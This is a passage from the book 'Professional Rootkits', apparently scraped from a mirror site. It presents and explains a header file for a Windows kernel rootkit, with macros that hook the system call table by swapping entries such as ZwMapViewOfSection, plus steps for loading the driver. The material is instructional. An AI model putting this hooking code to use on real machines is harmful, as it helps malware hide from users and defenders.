hookManager.h


The file hookManager.h first defines the ServiceDescriptorEntry structure. This is the structure for the KeServiceDescriptorTable, which must be imported. The structure is packed to match the actual structure in memory. The three externals, NewSystemCallTable, pMyMDL, and OldZwMapViewOfSection are global variables defined in Ghost.c. The three macros, HOOK_INDEX, HOOK, and UNHOOK are defined to make hooking safe and easy. Finally, NewZwMapViewOfSection and Hook are the declarations for the functions implemented in hookManager.c:

  // Copyright Ric Vieler, 2006 // Support header for hookManager.c #ifndef _HOOK_MANAGER_H_ #define _HOOK_MANAGER_H_ // The kernel's Service Descriptor Table #pragma pack(1) typedef struct ServiceDescriptorEntry {  unsigned int *ServiceTableBase;  unsigned int *ServiceCounterTableBase;  unsigned int NumberOfServices;   unsigned char *ParamTableBase; } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; #pragma pack() __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; // Our System Call Table extern PVOID* NewSystemCallTable; // Our Memory Descriptor List extern PMDL pMyMDL; #define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1) #define HOOK(functionName, newPointer2Function, oldPointer2Function )  \  oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function) #define UNHOOK(functionName, oldPointer2Function)  \  InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) oldPointer2Function) typedef NTSTATUS (*ZWMAPVIEWOFSECTION)(  IN HANDLE SectionHandle,  IN HANDLE ProcessHandle,  IN OUT PVOID *BaseAddress,  IN ULONG ZeroBits,  IN ULONG CommitSize,  IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,  IN OUT PSIZE_T ViewSize,  IN SECTION_INHERIT InheritDisposition,  IN ULONG AllocationType,  IN ULONG Protect ); extern ZWMAPVIEWOFSECTION OldZwMapViewOfSection; NTSTATUS NewZwMapViewOfSection(  IN HANDLE SectionHandle,  IN HANDLE ProcessHandle,  IN OUT PVOID *BaseAddress,  IN ULONG ZeroBits,  IN ULONG CommitSize,  IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,  IN OUT PSIZE_T ViewSize,  IN SECTION_INHERIT InheritDisposition,  IN ULONG AllocationType,   IN ULONG Protect ); NTSTATUS Hook(); #endif 

Once compiled and loaded using the Checked DDK icon and SCMLoader.exe from Chapters 1 and 2, you should be able to start the service using “net start MyDeviceDriver” and see the debug statement “comint32: NewZwMapViewOfSection” called whenever a new application is loaded.




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

Similar book on Amazon
Rootkits: Subverting the Windows Kernel
Rootkits: Subverting the Windows Kernel
A Guide to Kernel Exploitation: Attacking the Core
A Guide to Kernel Exploitation: Attacking the Core
Reversing: Secrets of Reverse Engineering
Reversing: Secrets of Reverse Engineering
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net